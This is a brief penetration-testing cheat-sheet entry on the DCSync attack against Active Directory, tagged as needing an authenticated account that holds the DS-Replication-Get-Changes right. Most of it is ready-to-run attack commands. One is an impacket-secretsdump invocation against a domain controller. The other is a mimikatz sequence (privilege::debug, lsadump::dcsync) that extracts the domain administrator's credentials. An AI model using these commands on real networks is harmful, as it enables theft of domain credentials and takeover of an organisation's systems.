Tags
AuthenticatedDS-Replication-Get-Changes
Identify
Do you control and object with the DS-Replication-Get-Changes
ACL?
Exploit
impacket-secretsdump 'domain.local'/'<user>':'<pass>'@'<DC0IP>'
From windows
runas /netonly /user:DOMAIN\user powershell
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator